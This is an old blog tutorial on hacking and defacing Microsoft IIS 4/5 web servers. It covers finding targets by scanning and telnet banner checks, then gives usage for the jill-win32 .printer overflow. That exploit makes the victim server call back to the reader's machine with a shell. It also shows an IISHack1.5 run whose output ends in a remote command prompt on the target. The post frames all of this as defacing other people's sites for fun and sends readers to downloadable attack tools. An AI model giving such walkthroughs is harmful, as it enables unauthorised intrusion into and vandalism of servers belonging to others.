Saturday 18 June 2011

IIS ( Web server/web page) hacking

IIS is Microsoft's internet server. It is very buggy and very exploitable. Defacing a IIS server is actually very easy. Alot of system administrators does not load patches on their IIS servers so they are the people who gets defaced (hacked). Current IIS servers I will show u to hack is IIS 4/5. IIS 6 is the industry standard at the moment, but there is still alot of IIS4/5 servers online. The way IIS server are being hacked is though buffer overflows and exploits. This is when a certain code is sent to the server, the server gets confused and grants you root access to the server. In the IIS hacking download section there is alot of IIS hacking tools making it easy for anyone to hack a IIS server. Not all webservers are run on IIS, there is many other webserver software out there like Apache. We will only be dealing with IIS servers.

Firstly you have to find a IIS server. Dreamscape IISscanner is very useful. It gives you the option to scan a certain IP or an IP range. It will search and tell you if it finds any IIS servers, and which version the host is running.. Another way is to telnet to the IP on port 80. In dos prompt (Start, Run,CMD) type in : telnet 80. It will open telnet and show you what IIS the host is running. Web servers normally runs on port 80, but it can be any other specified port.

If you find a IIS server, it's time to DEFACE it :) Go check on my IIS hacking page for IIS hacking programs. We will first use Jill-win32 for now. It exploits an IIS5 printer overflow. In dos prompt (Start, Run) run jill-win32. It will show you this :

iis5 remote .printer overflow.
dark spyrit <> / beavuh labs.
usage: jill-win32

An example how to use it :

jill-win32 80 69 - is the IIS server you want to deface, port 80 is the port the server runs it IIS service on, is your IP, and port 69 is the port TFPD32 (available from this zip file) will listen on. When you run jill-win32 it will exploit a printer overflow on the IIS server and create a backdoor on the server which will connect to port 69 on your PC, which TFPD32 listening on.

Here is a another example :

Download IISHack and do the following :

Usage: IISHack1.5 [server] [server-port] [trojan-port]

C:\send resume to> iishack1.5.exe www.[yourowncompany].com 80 6969
IISHack Version 1.5
eEye Digital Security
Code By: Ryan Permeh & Marc Maiffret
eEye Digital Security takes no responsibility for use of this code.
It is for educational purposes only.

Attempting to find an executable directory...
Trying directory [scripts]
Executable directory found. [scripts]
Path to executable directory is [C:\Inetpub\scripts]
Moving cmd.exe from winnt\system32 to C:\Inetpub\scripts.
Successfully moved cmd.exe to C:\Inetpub\scripts\eeyehack.exe
Sending the exploit...
Exploit sent! Now telnet to www.[yourowncompany].com on port 6969 and you should get a cmd prompt.
C:\> telnet www.[yourowncompany].com 6969
Trying www.[yourowncompany].com...
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.


For those people who does not have a clue what's going on in here, go the script kiddie way and download the other GUI ( graphical user interface ) IIS hacking programs from my IIS page and let the program deface the web page for you. There is a few IIS tutorials in Windows hacker misc section.